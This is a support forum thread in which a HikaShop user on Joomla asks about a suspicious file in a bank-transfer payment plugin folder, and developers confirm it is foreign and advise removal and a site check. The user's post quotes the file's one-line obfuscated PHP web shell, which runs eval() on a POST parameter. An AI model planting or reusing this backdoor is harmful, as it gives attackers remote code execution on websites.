Suspicious Code in Hikashop File

Start
Prev
1
Next
End

kchahine
Topic Author
Offline

Posts: 174
Thank you received: 4
Hikashop Business

9 years 7 months ago #225858

-- HikaShop version -- : 2.6.0
-- Joomla version -- : 3.4.8
-- PHP version -- : 5.5

Hi,
The file in

/plugins/hikashoppayment/banktransfer/start.php

has the following code

$ptcm54 = "post_" ; $xqnq6= strtoupper ( $ptcm54[4].$ptcm54[0] .$ptcm54[1].$ptcm54[2].$ptcm54[3] );if (isset(${$xqnq6 } [ 'q7f2521']) ) {eval (${ $xqnq6} [ 'q7f2521' ]);} ?

Does this look suspicious? (It was flagged by myjoomla.com)

Please Log in or Create an account to join the conversation.

Xavier
Offline

Posts: 13201
Thank you received: 2322

9 years 7 months ago #225868

Hi,

This looks indeed suspicious, as you can see on our end the banktransfer plugin should only have three files: take.ms/kgyfl

Last edit: 9 years 7 months ago by Xavier.

The following user(s) said Thank You: kchahine

Please Log in or Create an account to join the conversation.

kchahine
Topic Author
Offline

Posts: 174
Thank you received: 4
Hikashop Business

9 years 7 months ago #225930

Would a reinstall overwrite these files?

Please Log in or Create an account to join the conversation.

Jerome
Away
HikaShop core developer

Posts: 26264
Thank you received: 4043
MODERATOR

9 years 7 months ago #225931

Hi,

Yes, it will be highly recommended.
For sure you can remove that file which is not an HikaShop one.
And you should also perform a check on the rest of your Joomla files ; in case when some other files have been added or modified.

Regards,

Jerome - Obsidev.com
HikaMarket & HikaSerial developer / HikaShop core dev team.

Also helping the HikaShop support team when having some time or couldn't sleep.
By the way, do not send me private message, use the "contact us" form instead.

Please Log in or Create an account to join the conversation.

Start
Prev
1
Next
End

Time to create page: 0.064 seconds